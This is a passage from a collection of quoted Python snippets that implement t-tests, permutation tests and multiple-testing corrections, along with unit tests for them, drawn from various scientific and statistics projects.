{:s}={:8.{pc}f} \\u00B1{:.{pc}f}, {:d} (mean, SD, N)'.\n format(k[0].rjust(n), np.mean(g1), np.std(g1, ddof=1),\n len(g1), pc=decimals))\n print(u' {:s}={:8.{pc}f} \\u00B1{:.{pc}f}, {:d} (mean, SD, N)'.\n format(k[1].rjust(n), np.mean(g2), np.std(g2, ddof=1),\n len(g2), pc=decimals))\n summarizeData(data, decimals=decimals)\n # iqr1 = np.subtract(*np.percentile(g1, [75, 25]))\n # iqr2 = np.subtract(*np.percentile(g2, [75, 25]))\n # print(u' {:s}: median={:8.4f} IQR={:8.4f}'.format(k[0].rjust(n), np.median(g1), iqr1))\n # print(u' {:s}: median={:8.4f} IQR={:8.4f}'.format(k[1].rjust(n), np.median(g2), iqr2))\n print(u' Observed difference: {:8.4f}'.format(diffobs))\n print(u' p={:8.6f}, Nperm={:8d}\\n'.format(float(pvalue), int(nperm)))\n return(pvalue, nperm)", 
"def entropy_permutation_test(ordered_pitch_types, single_pitch_pdf, conditional_joint_probabilities, total_transitions,\n n=1000):\n pitch_types, pitch_probabilities = zip(*single_pitch_pdf.items())\n permutation_entropies = []\n progress = progressbar.ProgressBar()\n\n for test_number in progress(xrange(n)):\n # create the new matrix\n permutation_counts = {}\n for first_pitch_type in ordered_pitch_types:\n permutation_counts[first_pitch_type] = {}\n for second_pitch_type in ordered_pitch_types:\n permutation_counts[first_pitch_type][second_pitch_type] = 0\n\n pitch_permutation = numpy.random.choice(pitch_types, total_transitions, p=pitch_probabilities)\n current_pitch = numpy.random.choice(pitch_types, p=pitch_probabilities)\n for next_pitch in pitch_permutation:\n permutation_counts[current_pitch][next_pitch] += 1\n current_pitch = next_pitch\n\n joint_probabilities, _, _ = joint_probabilities_from_transitions(ordered_pitch_types, permutation_counts)\n permutation_entropies.append(entropy_from_probability_matrix(joint_probabilities))\n\n joint_entropy = entropy_from_probability_matrix(conditional_joint_probabilities)\n # print 'Mean', numpy.mean(permutation_entropies)\n # print 'Standard deviation', numpy.std(permutation_entropies)\n # tdof, tloc, tscale = stats.t.fit(permutation_entropies)\n # print 'DF', tdof, 'Loc (mean)', tloc, 'Scale (SD)', tscale\n # t_score = (joint_entropy - tloc) / tscale\n # print stats.t.cdf(joint_entropy, df=tdof, loc=tloc, scale=tscale)\n\n mean, stddev = stats.norm.fit(permutation_entropies)\n print 'Mean = {mean}\\t StdDev = {stddev}'.format(mean=mean, stddev=stddev)\n z_score = (joint_entropy - mean) / stddev\n p_value = stats.norm.cdf(joint_entropy, mean, stddev)\n print 'The joint entropy has a Z-score of {z_score} which gives a P-value of {p_value}'.format(z_score=z_score,\n p_value=p_value)\n return z_score, p_value", "def test_all_pairs_t_test_no_perms(self):\r\n exp = \"\"\"# The tests of significance were performed using a two-sided Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean != Group 2 mean\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. 
no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00708047956412\t0.0212414386924\tN/A\tN/A\r\nfoo\tbaz\t-9.79795897113\t0.000608184944463\t0.00182455483339\tN/A\tN/A\r\nbar\tbaz\t-3.0\t0.0576688856224\t0.173006656867\tN/A\tN/A\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2,\r\n num_permutations=0)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def ttest():\n # open test results and perform regression analysis\n alphas = []\n betas = []\n iterations = {}\n with open(f\"Results/conclusion2.csv\") as f:\n csv_reader = csv.reader(f, delimiter=',')\n\n for run in csv_reader:\n max, max_i = get_max_run(run)\n if int(run[0]) not in iterations:\n iterations[int(run[0])] = {100 - int(run[1])-1: int(max)}\n else:\n iterations[int(run[0])][100 - int(run[1])-1] = int(max)\n\n for iteration in iterations:\n mono_levels = list(iterations[iteration].keys())\n pop_sizes = [iterations[iteration][i] for i in mono_levels]\n\n regress_result = regress(pop_sizes, mono_levels)\n alphas += [regress_result[1]]\n betas += [regress_result[0]]\n\n # plot scatter and regression line\n avg_alpha = sum(alphas)/len(alphas)\n avg_beta = sum(betas)/len(betas)\n stddev_beta = np.std(betas)\n vis.scatter_mono(iterations, avg_alpha, avg_beta)\n\n # perform t-test\n ttest_result = stats.ttest_ind(betas, [0 for i in betas], equal_var=True)\n t_stat = ttest_result[0]\n p_value = ttest_result[1]\n print(f'Results from t-test:')\n print(f'Avg beta: {avg_beta}, stddev beta: {stddev_beta}.')\n print(f't-stat: {t_stat}, p-value: {p_value}.')", "def posthoc_ttests(dataframe, var_='dVz'):\n posthocs = pg.pairwise_ttests(data=dataframe, dv=var_, within='block', subject='user', between='condition',\n alpha=0.05, within_first=False,\n padjust='fdr_by', marginal=True, return_desc=True, tail='one-sided', parametric=True)\n return posthocs", "def ttest(self, data: ['SASdata', str] = None,\n by: str = None,\n cls: [str, list] = None,\n freq: str = None,\n paired: str = None,\n var: str = None,\n weight: str = None,\n procopts: str = None,\n stmtpassthrough: str = None,\n **kwargs: dict) -> SASresults:", "def _perm_stat(self, index): # pragma: no cover\n\n permu = np.random.permutation(self.u)\n permv = np.random.permutation(self.v)\n\n # calculate permuted statics, store in null distribution\n perm_stat = self.indep_test._statistic(permu, permv)\n\n return perm_stat", "def t_test(sample1, sample2, paired=False, alpha=0.05,\n alternative='two-sided', correction='auto', r=0.707,\n show_graph=True, **kwargs):\n confidence = 1 - alpha\n df_result = pg.ttest(\n sample1,\n sample2,\n paired=paired,\n confidence=confidence,\n alternative=alternative,\n correction=correction,\n r=r\n )\n if show_graph:\n if paired:\n difference = [x - y for x, y in zip(sample1, sample2)]\n Visualization.histogram(difference, **kwargs)\n else:\n Visualization.density_plot(sample1, sample2,\n fig_size=(5, 4), **kwargs)\n return HypothesisTester.define_hypothesis(df_result, 'mean',\n alternative, paired,\n alpha).T", "def test_pairwise(self, test_type='t-test'):\n return pair_tests(self.evaluations, test_type, self.diff_var, self.dof)", "def t_one_sample(x, mu, tails=2):\n assert tails in (1,2), \"invalid: tails must be 1 or 2, found %s\"%str(tails)\n x = np.asarray(x)\n N = x.size\n df = N - 1\n t_obs = (x.mean() - mu) / (x.std() / np.sqrt(N))\n p_value 
= tails * st.t.sf(abs(t_obs), df)\n return TtestResults(t_obs, p_value)", "def ttest_two(samp_file, ctrl_file, fileout, p=0.01):\n np_samp = np.loadtxt(samp_file, delimiter=',', dtype=object)\n np_ctrl = np.loadtxt(ctrl_file, delimiter=',', dtype=object)\n count = np_samp.shape[0]\n if np_samp.shape[0] != np_ctrl.shape[0]:\n raise ValueError(\"Number of windows between sample and control files are different!\")\n ot = np.zeros((count, 9), dtype=object) # array to hold info for each bin\n wig = open(fileout + \".wig\", \"w\")\n chr_i = None\n prev = 0\n chr_ctrl = np_ctrl[:, 0] # chr\n chr_samp = np_samp[:, 0]\n ran_ctrl = np_ctrl[:, 1:3].astype(int) # start and end coordinates\n ran_samp = np_samp[:, 1:3].astype(int)\n bin_ctrl = np_ctrl[:, 3:].astype(int) # bins\n bin_samp = np_samp[:, 3:].astype(int)\n for i in range(count):\n if chr_samp[i] != chr_ctrl[i] or ran_samp[i, 0] != ran_ctrl[i, 0] \\\n or ran_samp[i, 1] != ran_ctrl[i, 1]:\n raise ValueError(\"Between sample and control files, the chr, start, or end coordinates \"\n \"are different!\")\n else:\n if chr_samp[i] != chr_i:\n chr_i = chr_samp[i]\n wig.write(\"variableStep\\tchrom=%s\\n\" % chr_i)\n ot[i, 0:3] = np_samp[i, 0:3] # chr, start, and end coordinates\n ot[i, 3] = np.sum(bin_ctrl[i, :]) # sum of ctrl\n ot[i, 4] = np.sum(bin_samp[i, :]) # sum of sample\n ttest = stats.ttest_rel(bin_samp[i, :], bin_ctrl[i, :])\n ot[i, 5] = ttest[0] # t test\n ot[i, 6] = ttest[1] # t test\n start_i = ran_samp[i, 0]\n if ot[i, 5] > 0 and ot[i, 6] / 2 < p / count: # one-sided t-test with Bonferroni\n ot[i, 7] = 1\n ot[i, 8] = start_i - prev\n prev = start_i\n wig.write(\"%i\\t%i\\n\" % (start_i, 1))\n else:\n ot[i, 7] = np.nan\n ot[i, 8] = np.nan\n wig.write(\"%i\\t%i\\n\" % (start_i, 0))\n status_statement(i, count, 20, chr_i)\n wig.close()\n np.savetxt(fileout + \"_ttest.csv\", ot, fmt='%s', delimiter=',')", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n m = Module()\r\n m.random = RandomStreams(utt.fetch_seed())\r\n m.fn = Method([], m.random.permutation((20,), 10))\r\n\r\n made = m.make()\r\n made.random.initialize()\r\n fn_val0 = made.fn()\r\n fn_val1 = made.fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def all_pairs_t_test(labels, dists, tail_type='two-sided',\r\n num_permutations=999):\r\n result = ''\r\n\r\n if len(labels) != len(dists):\r\n raise ValueError(\"The number of distribution labels must match the \"\r\n \"number of distributions.\")\r\n if tail_type not in tail_types:\r\n raise ValueError(\"Invalid tail type '%s'. Must be one of %r.\" %\r\n (tail_type, tail_types))\r\n if num_permutations < 0:\r\n raise ValueError(\"Invalid number of permutations: %d. 
Must be greater \"\r\n \"than or equal to zero.\" % num_permutations)\r\n\r\n result += '# The tests of significance were performed using a ' + \\\r\n tail_type_desc[tail_type][0] + ' Student\\'s two-sample t-test.\\n'\r\n\r\n result += ('# Alternative hypothesis: Group 1 mean %s Group 2 mean\\n' %\r\n tail_type_desc[tail_type][1])\r\n\r\n if num_permutations > 0:\r\n result += '# The nonparametric p-values were calculated using ' + \\\r\n '%d Monte Carlo permutations.\\n' % num_permutations\r\n result += '# The nonparametric p-values contain the correct ' + \\\r\n 'number of significant digits.\\n'\r\n\r\n result += '# Entries marked with \"N/A\" could not be calculated because ' + \\\r\n 'at least one of the groups\\n# of distances was empty, ' + \\\r\n 'both groups each contained only a single distance, or\\n' + \\\r\n '# the test could not be performed (e.g. no variance in ' + \\\r\n 'groups with the same mean).\\nGroup 1\\tGroup 2\\t' + \\\r\n 't statistic\\tParametric p-value\\tParametric p-value ' + \\\r\n '(Bonferroni-corrected)\\tNonparametric p-value\\t' + \\\r\n 'Nonparametric p-value (Bonferroni-corrected)\\n'\r\n\r\n stats = _perform_pairwise_tests(labels, dists, tail_type, num_permutations)\r\n for stat in stats:\r\n stat = ['N/A' if e is nan else e for e in stat]\r\n result += '%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n' % (stat[0], stat[1], stat[2],\r\n stat[3], stat[4],\r\n format_p_value_for_num_iters(stat[5], num_permutations) if\r\n stat[5] != 'N/A' else 'N/A',\r\n format_p_value_for_num_iters(stat[6], num_permutations) if\r\n stat[6] != 'N/A' else 'N/A')\r\n return result", "def test_mc_t_two_sample_no_permuted_variance(self):\r\n # Verified against R's t.test() and Deducer::perm.t.test().\r\n x = array([1, 1, 2])\r\n y = array([2, 2, 1])\r\n\r\n exp = (-0.70710678118654791, 0.51851851851851838)\r\n obs = mc_t_two_sample(x, y, permutations=10000)\r\n\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 10000)\r\n self.assertCorrectPValue(0.97, 1.0, mc_t_two_sample, [x, y],\r\n {'permutations': 10000}, p_val_idx=3)", "def t_paired(x, y, mu=0, tails=2):\n assert tails in (1,2), \"invalid: tails must be 1 or 2, found %s\"%str(tails)\n x, y = np.asarray(x), np.asarray(y)\n x_d = x - y\n N = x_d.size\n df = 2 * N - 2\n t_obs = (x_d.mean() - mu) / (x_d.std() / np.sqrt(N))\n p_value = tails * st.t.sf(abs(t_obs), df)\n return TtestResults(t_obs, p_value)", "def simulate_lof_scores(table, n_permutations, genes, samples, summary_func):\n perm_scores = []\n print(\"Permuting mutation data\", n_permutations, \"times:\", end=' ',\n file=sys.stderr)\n for idx in range(n_permutations):\n print(idx + 1, end=' ', file=sys.stderr)\n permute_table(table)\n ptable = make_lof_table(table, genes, samples, summary_func)\n perm_scores.extend(s for g, s in\n lof_sig_scores(ptable, samples, False))\n perm_scores = numpy.asfarray(sorted(perm_scores))\n print(\"\\nMax permutation score:\", perm_scores[-1], file=sys.stderr)\n return perm_scores", "def permTS(dataDict=None, dataLabel='data', mode='exact.ce'):\n\n # test calling values\n if mode not in ['exact.ce', 'exact.mc']:\n raise ValueError('RStats.permTS: Mode must be either'\n + ' \"exact.ce\" or \"exact.mc\"; got %s' % mode)\n if dataDict is None or not (isinstance(dataDict, dict) \n or len(dataDict.keys()) != 2):\n raise ValueError('RSTATS.permTX: dataDict must be'\n + ' a dictionary with exactly 2 keys')\n k = list(dataDict.keys())\n g1 = dataDict[k[0]]\n g2 = dataDict[k[1]]\n\n u = perm.permTS(\n FloatVector(g1), 
FloatVector(g2), alternative='two.sided',\n method=mode)\n pvalue = float(u[3][0])\n if mode == 'exact.mc':\n nmc = int(u[10][0])\n else:\n nmc = 0\n d = u[1].items() # stored as a generator (interesting...) # using next for py2/3\n estdiff = next(d) #.next() # gets the tuple with what was measured, and the value \n if dataLabel is not None:\n print('\\nPermutation Test (R permTS). Dataset = %s' % (dataLabel))\n print(u' Test statistic: ({:s}): {:8.4f}'.\n format(estdiff[0], estdiff[1]))\n print(u' p={:8.6f}, Nperm={:8d} [mode={:s}]'.\n format(float(pvalue), int(nmc), mode))\n return (pvalue, nmc) # return the p value and the number of mc replicatess", "def t_test_(x):\n assert np.ndim(x) == 1 and (not np.any(np.isnan(x)))\n\n if (len(x) <= 1) or (not np.all(np.isfinite(x))):\n return 1.0 # Can't say anything about scale => p=1\n\n _, pval = sst.ttest_1samp(x, 0.0)\n if np.isnan(pval):\n # Should only be possible if scale underflowed to zero:\n assert np.var(x, ddof=1) <= 1e-100\n # It is debatable if the condition should be ``np.mean(x) == 0.0`` or\n # ``np.all(x == 0.0)``. Should not matter in practice.\n pval = np.float(np.mean(x) == 0.0)\n assert 0.0 <= pval and pval <= 1.0\n return pval", "def pvalue(data, control_label=None, *args, **kwargs):\n def fn(control, test):\n if _is_proportion(control, test):\n return ztest(control, test, alternative='two-sided')[1]\n else:\n return ttest_ind(control, test, alternative='two-sided')[1]\n\n return _apply(data, fn, control_label)", "def ttest(x):\n from ..group.onesample import stat\n t = stat(x.T, id='student', axis=0)\n return np.squeeze(t)", "def peak_reproducibility(data, vardata, domain, ngroups, sigma, method='crfx',\n swap=False, verbose=0, **kwargs):\n tiny = 1.e-15\n nsubj = data.shape[1]\n samples = draw_samples(nsubj, ngroups)\n all_pos = []\n\n # compute the positions in the different subgroups\n for i in range(ngroups):\n x = data[:, samples[i]]\n\n if swap:\n # apply a random sign swap to x\n x *= (2 * (np.random.rand(len(samples[i])) > 0.5) - 1)\n\n if method is not 'crfx':\n vx = vardata[:, samples[i]]\n if method is not 'bsa':\n threshold = kwargs['threshold']\n\n if method == 'crfx':\n stat_map = ttest(x)\n elif method == 'cmfx':\n stat_map = mfx_ttest(x, vx)\n elif method == 'cffx':\n stat_map = fttest(x, vx)\n elif method == 'cjt':\n if 'k' in kwargs:\n k = kwargs['k']\n else:\n k = nsubj / 2\n stat_map = conjunction(x, vx, k)\n\n pos = get_peak_position_from_thresholded_map(\n stat_map, domain, threshold)\n all_pos.append(pos)\n else:\n # method='bsa' is a special case\n tx = x / (tiny + np.sqrt(vx))\n afname = kwargs['afname']\n theta = kwargs['theta']\n dmax = kwargs['dmax']\n ths = kwargs['ths']\n thq = kwargs['thq']\n smin = kwargs['smin']\n niter = kwargs['niter']\n afname = afname + '_%02d_%04d.pic' % (niter, i)\n pos = coord_bsa(domain, tx, theta, dmax, ths, thq, smin, afname)\n all_pos.append(pos)\n\n # derive a kernel-based goodness measure from the pairwise comparison\n # of sets of positions\n score = 0\n for i in range(ngroups):\n for j in range(i):\n score += statistics_from_position(all_pos[i], all_pos[j], sigma)\n score += statistics_from_position(all_pos[j], all_pos[i], sigma)\n score /= (ngroups * (ngroups - 1))\n return score", "def test_all_pairs_t_test(self):\r\n # We aren't testing the numeric values here, as they've already been\r\n # tested in the functions that compute them. 
We are interested in the\r\n # format of the returned string.\r\n exp = \"\"\"# The tests of significance were performed using a two-sided Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean != Group 2 mean\r\n# The nonparametric p-values were calculated using 999 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00708047956412\t0.0212414386924\t0.095\t0.285\r\nfoo\tbaz\t-9.79795897113\t0.000608184944463\t0.00182455483339\t0.101\t0.303\r\nbar\tbaz\t-3.0\t0.0576688856224\t0.173006656867\t0.217\t0.651\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def _run_individual_permutation_tests(\r\n matrix: csr_matrix,\r\n seeds: List[types.BioEntity],\r\n uids: Dict[types.BioEntity, int],\r\n permutations: int = 250,\r\n alpha: np.double = 0.15,\r\n single: bool = False\r\n) -> pd.DataFrame:\r\n\r\n ## First get the proximity vector for the walk\r\n prox_vector = _run_individual_walks(matrix, seeds, uids, alpha, single=single)\r\n\r\n ## Start the permutation testing\r\n for i in range(permutations):\r\n\r\n ## Shuffle the node labels\r\n permuted_uids = graph.shuffle_node_labels(uids)\r\n\r\n ## Run the permuted walk\r\n permuted_vector = _run_individual_walks(\r\n matrix, seeds, permuted_uids, alpha, single=single\r\n )\r\n\r\n ## Join on the original results\r\n prox_vector[f'p_{i}'] = permuted_vector.probability\r\n\r\n return prox_vector", "def multi_point_mutation(variables_number: int,\n mutation_chance: float,\n mutation_points_number: int) -> MutationPointsTyping:\n scaled_mutation_chance = variables_number * mutation_chance / mutation_points_number\n if generate_random_float(0, 1) <= scaled_mutation_chance:\n return choose_random_values(values_pool=range(variables_number), values_number=mutation_points_number)\n return []", "def test_TPt(self):\n\n test_value = self.portfolio.calculate_total_performance(\n *self.boarder)[self.test_row_number]\n calculated_value = self.manual_cumprod(\n self.portfolio._get_total_portfolio)\n self.assertAlmostEqual(test_value, calculated_value)", "def t_test(result, reference):\n \n # Check that result and reference are 1D and that they have the same length\n \n print('\\nChecking that result and reference are 1D and that they have the same length\\n')\n \n if (len(result.shape) == 1) and (len(reference.shape) == 1):\n \n if len(result) == len(reference):\n \n print('Performing t test\\n')\n \n t_stat, p_value = scipy.stats.ttest_ind(result, reference)\n \n print('t test completed successfully!\\n')\n \n print('t statistic: {} // p value: {}'.format(t_stat, p_value))\n \n return t_stat, p_value\n \n else:\n \n print('Result and reference vectors do not have the same length. Please input them so that they have the same length')\n \n else:\n \n print('Result or reference vectors are not 1D. 
Please reformat them to be 1D')", "def ttest_2samp(x1, x2, alpha=0.05, paired=False, is_bernoulli=False, two_sided=True, return_tuple=False):\n x = np.asarray(x1)\n y = np.asarray(x2)\n\n # Define test degrees of freedom\n if two_sided:\n quant_order = 1 - (alpha / 2)\n h0 = 'X1_bar = X2_bar'\n h1 = 'X1_bar != X2_bar'\n else:\n quant_order = 1 - alpha\n h0 = 'X1 <= X2'\n h1 = 'X1 > X2'\n\n # Sample sizes\n n1, n2 = len(x), len(y)\n\n if paired:\n # If samples are paired, we perform a 1-sample student test\n # We compare if the difference is different from 0.\n mean1, mean2 = x.mean(), y.mean()\n d = x - y\n t, cv, p = ttest(d, alpha=alpha, return_tuple=True)\n df = len(d)\n else:\n # Else samples are independent\n # Compute means\n mean1, mean2 = x.mean(), y.mean()\n # Compute standard deviations\n if is_bernoulli:\n s1 = mean1 * (1 - mean1)\n s2 = mean2 * (1 - mean2)\n else:\n s1 = desc.var(x)\n s2 = desc.var(y)\n # Compute grouped variance\n sd = np.sqrt(((n1 - 1) * s1 + (n2 - 1) * s2) / (n1 + n2 - 2))\n # Degrees of freedom\n df = n1 + n2 - 2\n # Calculate the t statistic\n t = (mean1 - mean2) / sd\n\n # calculate the critical value\n cv = scp.t.ppf(quant_order, df)\n # calculate the p-value\n if (n1 > 30) & (n2 > 30):\n p = 2.0 * (1.0 - scp.norm.cdf(math.fabs(t)))\n else:\n p = 2.0 * (1.0 - scp.t.cdf(math.fabs(t), df=df))\n\n extra = f\" * E(X1) = {round(mean1, 3)} and E(X2) = {round(mean2, 3)} \\n\"\n extra += \" * Performed test for paired samples \\n\" if paired else ''\n extra += \" * Large sample sizes, t ~ N(0, 1) from CLT\" if (n1 > 30) & (n2 > 30) else ' * Small sample sizes, assumed t ~ T(n-1)'\n\n _summ = test_summary(df=df, critical_value=cv, t_value=t,\n p_value=p,\n title='Two Samples Student test',\n h0=h0, h1=h1,\n alpha=alpha,\n extra=extra)\n\n if return_tuple:\n return t, cv, p\n else:\n return _summ", "def correct_pvalues_for_multiple_testing(pvalues, correction_type = \"Benjamini-Hochberg\"):\n pvalues = array(pvalues)\n n = int(pvalues.shape[0])\n new_pvalues = empty(n)\n if correction_type == \"Bonferroni\":\n new_pvalues = n * pvalues\n elif correction_type == \"Bonferroni-Holm\":\n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ]\n values.sort()\n for rank, vals in enumerate(values):\n pvalue, i = vals\n new_pvalues[i] = (n-rank) * pvalue\n elif correction_type == \"Benjamini-Hochberg\":\n values = [ (pvalue, i) for i, pvalue in enumerate(pvalues) ]\n values.sort()\n values.reverse()\n new_values = []\n for i, vals in enumerate(values):\n rank = n - i\n pvalue, index = vals\n new_values.append((n/rank) * pvalue)\n for i in range(0, int(n)-1):\n if new_values[i] < new_values[i+1]:\n new_values[i+1] = new_values[i]\n for i, vals in enumerate(values):\n pvalue, index = vals\n new_pvalues[index] = new_values[i]\n return new_pvalues", "def ttest(\n data, dataLabel=None, paired=False, decimals=4,\n textline=False, units=None\n ):\n\n # test calling values\n if data is None or not isinstance(data, dict) or len(data.keys()) != 2:\n raise ValueError('RSTATS.ttest: data must be a dictionary'\n + ' with at exactly 2 keys'\n + '\\nUse KW (anova) for more than 2 groups')\n\n k = list(data.keys())\n g = {}\n n = {}\n gmean = {}\n gstd = {}\n\n g[1] = data[k[0]]\n g[2] = data[k[1]]\n n[1] = len(g[1])\n n[2] = len(g[2])\n # (w1, p1) = Stats.shapiro(g1, a=None, reta=False)\n # (w2, p2) = Stats.shapiro(g2, a=None, reta=False)\n # Tb, pb = Stats.bartlett(g1, g2) # do bartletss for equal variance\n equalVar = False\n\n if paired:\n print (len(g[1]), len(g[2]))\n (t, p) 
= Stats.ttest_rel(g[1], g[2])\n else:\n (t, p) = Stats.ttest_ind(g[1], g[2], equal_var=equalVar)\n gmean[1] = np.mean(g[1])\n gstd[1] = np.std(g[1], ddof=1)\n gmean[2] = np.mean(g[2])\n gstd[2] = np.std(g[2], ddof=1)\n # df = (tstd[k]**2/tN[k] + dstd[k]**2/dN[k])**2 / (( (tstd[k]**2 /\n # tN[k])**2 / (tN[k] - 1) ) + ( (dstd[k]**2 / dN[k])**2 / (tN[k] - 1) ) )\n df = ((gstd[1]**2/n[1] + gstd[2]**2/n[2])**2\n / (((gstd[1]**2 / n[1])**2 / (n[1] - 1)\n + ((gstd[2]**2 / n[2])**2 / (n[1] - 1))))\n )\n if dataLabel is not None:\n testtype = 'Independent'\n if paired:\n testtype = 'Paired'\n n = max([len(l) for l in k])\n print ('\\n%s\\n %s T-test, Welch correction' % (dataLabel, testtype))\n # if p1 < 0.05 and p2 < 0.05:\n # print(u' Both data sets appear normally distributed: Shapiro-Wilk Group 1 p = {:6.3f}, Group2 p = {:6.3f}'.format(p1, p2))\n # else:\n # print(u' ****At least one Data set is NOT normally distributed****\\n Shapiro-Wilk Group 1 p = {:6.3f}, Group2 p = {:6.3f}'.format(p1, p2))\n # print (u' (performing test anyway, as requested)')\n # if equalVar:\n # print(u' Variances are equivalent (Bartletts test, p = {:.3f})'.format(pb))\n # else:\n # print(u' Variances are unequal (Bartletts test, p = {:.3f}); not assuming equal variances'.format(pb))\n print(u' {:s}={:8.{pc}f} (SD {:.{pc}f}, N = {:d})'.\n format(k[0].rjust(n), gmean[1], gstd[1],\n len(g[1]), pc=decimals))\n print(u' {:s}={:8.{pc}f} (SD {:.{pc}f}, N = {:d})'.\n format(k[1].rjust(n), gmean[2], gstd[2],\n len(g[2]), pc=decimals))\n print(u' t({:6.2f})={:8.4f} p={:8.6f}\\n'.\n format(df, float(t), float(p)))\n # generate one line of text suitable for pasting into a paper\n if textline:\n if units is not None:\n units = ' ' + units\n else:\n units = ''\n fmtstring = u'{:s}: {:.{pc}f} (SD {:.{pc}f}, N={:d}){:s}; '\n print(u'(', end='')\n for s in range(1, 3):\n print(fmtstring.format(\n k[s-1], gmean[s], gstd[s], len(g[s]), units, \n pc=decimals), end='')\n print(u't{:.2f}={:.3f}, p={:s})\\n'.format(df, float(t), pformat(p)))\n\n return(df, float(t), float(p))", "def multiple_testing_correction(pvalues, correction_type=\"FDR\"):\n from numpy import array, empty\n pvalues = array(pvalues)\n sample_size = pvalues.shape[0]\n qvalues = empty(sample_size)\n if correction_type == \"Bonferroni\":\n # Bonferroni correction\n qvalues = sample_size * pvalues\n elif correction_type == \"Bonferroni-Holm\":\n # Bonferroni-Holm correction\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n values.sort()\n for rank, vals in enumerate(values):\n pvalue, i = vals\n qvalues[i] = (sample_size-rank) * pvalue\n elif correction_type == \"FDR\":\n # Benjamini-Hochberg, AKA - FDR test\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\n values.sort()\n values.reverse()\n new_values = []\n for i, vals in enumerate(values):\n rank = sample_size - i\n pvalue, index = vals\n new_values.append((sample_size/rank) * pvalue)\n for i in range(0, int(sample_size)-1):\n if new_values[i] < new_values[i+1]:\n new_values[i+1] = new_values[i]\n for i, vals in enumerate(values):\n pvalue, index = vals\n qvalues[index] = new_values[i]\n return qvalues", "def posterior_sampler(self, nsamples, seed=0, verbose=True):\n\n import random\n\n random.seed(seed)\n sample = self.get_chain()[-self.get_tune:]\n sample = sample.reshape(-1, sample.shape[-1])\n sample = random.choices(sample, k=nsamples)\n\n return sample", "def test_2_1(self):\r\n input = matrix()\r\n p = ivector()\r\n out = permute_row_elements(input, p)\r\n permute = function([input, p], 
out)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n input_val = rng.uniform(size=(3, 5)).astype(config.floatX)\r\n p_val = rng.permutation(5).astype('int32')\r\n out_val = permute(input_val, p_val)\r\n\r\n # The same permutation should be applied to every row of the input matrix.\r\n out_bis = numpy.asarray([r[p_val] for r in input_val])\r\n assert numpy.all(out_val == out_bis)\r\n\r\n # Verify gradient\r\n def permute_fixed(s_input):\r\n \"\"\"Auxiliary op defined to get rid of gradient wrt p_val\"\"\"\r\n return permute_row_elements(s_input, p_val)\r\n utt.verify_grad(permute_fixed, [input_val])", "def test_repeated_right_tailed(self):\n rng = np.random.default_rng(3571954324)\n\n passed = 0\n n_iter = 500\n for _ in range(n_iter):\n data1 = rng.normal(2, 1, 100)\n data2 = data1 + rng.normal(0, .02, 100)\n\n ttest = repeated_ttest(data1, data2, 'right')\n\n if ttest['P_value'] < .05:\n passed +=1\n\n self.assertAlmostEqual(passed / n_iter, .05, delta=.01)", "def testEjemploTp(self):\n azul = [0, 4, 5, 0]\n rojo = [1, 7, 4, 0]\n amarillo = [3, 6, 8, 0]\n negro = [6, 10, 10, 0]\n magenta = [7, 8, 12, 0]\n verde = [9, 11, 11, 0]\n perfiles = []\n perfiles.append(azul)\n perfiles.append(rojo)\n perfiles.append(amarillo)\n perfiles.append(negro)\n perfiles.append(magenta)\n perfiles.append(verde)\n perfil = Perfil.Perfil()\n resultadoEsperado = [0, 4, 1, 7, 4, 6, 6, 10, 9, 11, 11, 8, 12]\n for x in range(10000):\n inicial = random_integers(6, 0)\n inicial = inicial*4\n perfilOriginal = []\n for i in range (inicial, len(perfiles)+inicial, 1):\n perfilOriginal += perfiles[i%len(perfiles)]\n \n resultado = perfil.calcularPerfil(perfilOriginal, 0)\n self.assertEqual(resultadoEsperado, resultado)", "def test_mc_t_two_sample_single_obs_sample(self):\r\n sample = array([4.02, 3.88, 3.34, 3.87, 3.18])\r\n x = array([3.02])\r\n exp = (-1.5637254, 0.1929248)\r\n obs = mc_t_two_sample(x, sample)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertFloatEqual(len(obs[2]), 999)\r\n self.assertIsProb(obs[3])\r\n\r\n exp = (1.5637254, 0.1929248)\r\n obs = mc_t_two_sample(sample, x)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertFloatEqual(len(obs[2]), 999)\r\n self.assertIsProb(obs[3])\r\n\r\n # Test the case where we can have no variance in the permuted lists.\r\n x = array([1, 1, 2])\r\n y = array([1])\r\n exp = (0.5, 0.666666666667)\r\n obs = mc_t_two_sample(x, y)\r\n 